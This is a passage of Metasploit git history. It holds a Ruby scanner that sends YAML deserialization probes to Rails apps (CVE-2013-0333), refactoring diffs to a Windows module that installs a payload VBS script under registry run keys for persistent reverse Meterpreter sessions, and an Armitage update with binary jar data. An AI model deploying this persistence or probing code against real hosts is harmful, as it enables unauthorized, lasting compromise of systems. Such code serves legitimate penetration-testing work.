+# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Scanner', + 'Description' => %q{ + This module attempts to identify Ruby on Rails instances vulnerable to + an arbitrary object instantiation flaw in the JSON request processor. + }, + 'Author' => [ + 'jjarmoc', # scanner module + 'hdm' # CVE-2013-0156 scanner, basis of this technique. + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-0333'], + ] + )) + + register_options([ + OptString.new('URIPATH', [true, "The URI to test", "/"]), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT']]), + ], self.class) + end + + def send_probe(pdata) + res = send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/json', + 'data' => pdata + }, 25) + end + + def run_host(ip) + + # Straight JSON as a baseline + res1 = send_probe( + "{ \"#{Rex::Text.rand_text_alpha(rand(8)+1)}\" : \"#{Rex::Text.rand_text_alpha(rand(8)+1)}\" }" + ) + + unless res1 + vprint_status("#{rhost}:#{rport} No reply to the initial JSON request") + return + end + + if res1.code.to_s =~ /^[5]/ + print_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request") + print_error("\t\tDouble check URIPATH and HTTP_METHOD") + return + end + + # Deserialize a hash, this should work if YAML deserializes. + res2 = send_probe("--- {}\n".gsub(':', '\u003a')) + + unless res2 + vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe") + return + end + + # Deserialize a malformed object, inducing an error. + res3 = send_probe("--- !ruby/object:\x00".gsub(':', '\u003a')) + + unless res3 + vprint_status("#{rhost}:#{rport} No reply to the second YAML probe") + return + end + + vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}") + + if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200) + # If first and second requests are the same, and the third is different but not a 200, we're vulnerable. + print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML") + report_vuln({ + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => self.name, + :info => "Module triggered a #{res3.code} reply", + :refs => self.references + }) + else + # Otherwise we're not likely vulnerable. + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set") + end + end + +end \ No newline at end of file From 97edbb786898e3edaab81b6c77b0cbef99397779 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 00:58:26 +0100 Subject: [PATCH 361/421] using always a vbs file to drop exe --- modules/exploits/windows/local/persistence.rb | 46 +++---------------- 1 file changed, 7 insertions(+), 39 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 126b94e3f596..bdf9e7b822f7 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -59,28 +59,19 @@ def initialize(info={}) def exploit print_status("Running module against #{sysinfo['Computer']}") - rexe = datastore['EXE::Custom'] rexename = datastore['REXENAME'] delay = datastore['DELAY'] reg_val = datastore['REG_NAME'] - template_pe = datastore['EXE::Template'] @clean_up_rc = "" host,port = session.session_host, session.session_port - if rexe.nil? - script = create_script(delay, template_pe) - script_on_target = write_script_to_target(script,rexename) - if script_on_target == nil - # exit the module because we failed to write the file on the target host. - return - end - else - alt_pay_exe = get_custom_exe - script_on_target = write_exe_to_target(alt_pay_exe, rexename) - if script_on_target == nil - # exit the module because we failed to write the file on the target host. - return - end + exe = generate_payload_exe + script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay}) + script_on_target = write_script_to_target(script,rexename) + + if script_on_target == nil + # exit the module because we failed to write the file on the target host. + return end # Initial execution of script @@ -228,27 +219,4 @@ def write_to_reg(key,script_on_target, registry_value) end end - # Writesexecutable to target host - #------------------------------------------------------------------------------- - def write_exe_to_target(exe_raw, rexename) - if rexename.nil? - exe_name = Rex::Text.rand_text_alpha(rand(8)+8) - else - exe_name = rexename - end - - tempdir = session.fs.file.expand_path("%TEMP%") - tempexe = tempdir + "\\" + exe_name + ".exe" - begin - fd = session.fs.file.new(tempexe, "wb") - fd.write(exe_raw) - fd.close - print_good("Persistent executable written to #{tempexe}") - @clean_up_rc << "rm #{tempexe}\n" - rescue - print_error("Failed to write the payload on the target.") - tempexe = nil - end - return tempexe - end end From 42a6d96ff45a4e6eb1303328698d51a9ef502d95 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 01:33:07 +0100 Subject: [PATCH 362/421] using Post::File methods plus little more cleanup --- modules/exploits/windows/local/persistence.rb | 28 +++---------------- 1 file changed, 4 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index bdf9e7b822f7..4c2dcaca1fc2 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -26,11 +26,10 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Persistent Payload Installer', 'Description' => %q{ - This Module will create a boot persistent reverse Meterpreter session by + This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. - }, 'License' => MSF_LICENSE, 'Author' => @@ -54,8 +53,7 @@ def initialize(info={}) end - # Exploit Method for when run command is issued - #------------------------------------------------------------------------------- + # Exploit Method for when exploit command is issued def exploit print_status("Running module against #{sysinfo['Computer']}") @@ -114,20 +112,7 @@ def exploit ) end - # Creates persistent script - #------------------------------------------------------------------------------- - def create_script(delay, altexe) - if not altexe.nil? - vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe}) - else - vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay}) - end - print_status("Persistent agent script is #{vbs.length} bytes long") - return vbs - end - # Function for creating log folder and returning log path - #------------------------------------------------------------------------------- def log_file(log_path = nil) #Get hostname host = session.sys.config.sysinfo["Computer"] @@ -151,18 +136,15 @@ def log_file(log_path = nil) end # Writes script to target host - #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) - tempdir = session.fs.file.expand_path("%TEMP%") + tempdir = expand_path("%TEMP%") if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" end begin - fd = session.fs.file.new(tempvbs, "wb") - fd.write(vbs) - fd.close + write_file(tempvbs, vbs) print_good("Persistent Script written to #{tempvbs}") @clean_up_rc << "rm #{tempvbs}\n" rescue @@ -174,7 +156,6 @@ def write_script_to_target(vbs,name) end # Executes script on target and return the PID of the process - #------------------------------------------------------------------------------- def target_exec(script_on_target) execsuccess = true print_status("Executing script #{script_on_target}") @@ -193,7 +174,6 @@ def target_exec(script_on_target) end # Installs payload in to the registry HKLM or HKCU - #------------------------------------------------------------------------------- def write_to_reg(key,script_on_target, registry_value) # Lets start to assume we had success. write_success = true From 596b62b831d0b1cf2d887c9f56b127f38bc5a179 Mon Sep 17 00:00:00 2001 From: Raphael Mudge <rsmudge@gmail.com> Date: Mon, 11 Feb 2013 21:20:03 -0500 Subject: [PATCH 363/421] Armitage 02.12.13 - Distributed Operations This update adds the ability to manage multiple team server instances through one Armitage client. This update also adds nickname completion to the event log. Several bug fixes are included too. --- data/armitage/armitage.jar | Bin 3201422 -> 3213215 bytes data/armitage/cortana.jar | Bin 3201417 -> 3213210 bytes data/armitage/whatsnew.txt | 23 ++ external/source/armitage/resources/about.html | 2 +- .../armitage/scripts-cortana/internal.sl | 3 + external/source/armitage/scripts/armitage.sl | 24 +- .../source/armitage/scripts/collaborate.sl | 4 + external/source/armitage/scripts/gui.sl | 55 ++-- external/source/armitage/scripts/hosts.sl | 4 +- external/source/armitage/scripts/log.sl | 14 +- external/source/armitage/scripts/menus.sl | 14 +- external/source/armitage/scripts/passhash.sl | 45 +++- external/source/armitage/scripts/pivots.sl | 4 +- external/source/armitage/scripts/reporting.sl | 32 +-- external/source/armitage/scripts/server.sl | 61 ++--- external/source/armitage/scripts/targets.sl | 13 +- external/source/armitage/scripts/util.sl | 40 +-- .../src/armitage/ArmitageApplication.java | 43 +++- .../armitage/src/armitage/ArmitageBuffer.java | 138 ++++++++++ .../armitage/src/armitage/ArmitageMain.java | 35 ++- .../src/armitage/EventLogTabCompletion.java | 60 +++++ .../source/armitage/src/msf/DatabaseImpl.java | 10 +- .../source/armitage/src/msf/RpcAsync.java | 2 +- .../armitage/src/msf/RpcConnectionImpl.java | 28 +++ .../source/armitage/src/msf/RpcQueue.java | 2 +- .../armitage/src/table/NetworkTable.java | 16 +- .../source/armitage/src/ui/MultiFrame.java | 238 ++++++++++++++++++ external/source/armitage/whatsnew.txt | 23 ++ 28 files changed, 766 insertions(+), 167 deletions(-) create mode 100644 external/source/armitage/src/armitage/ArmitageBuffer.java create mode 100644 external/source/armitage/src/armitage/EventLogTabCompletion.java create mode 100644 external/source/armitage/src/ui/MultiFrame.java diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 153f8f95c0a3a630595e86b91d6525cd8b693519..81c949a109ac3c80b8d548f63b2d1a95ddbb839e 100755 GIT binary patch delta 119098 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 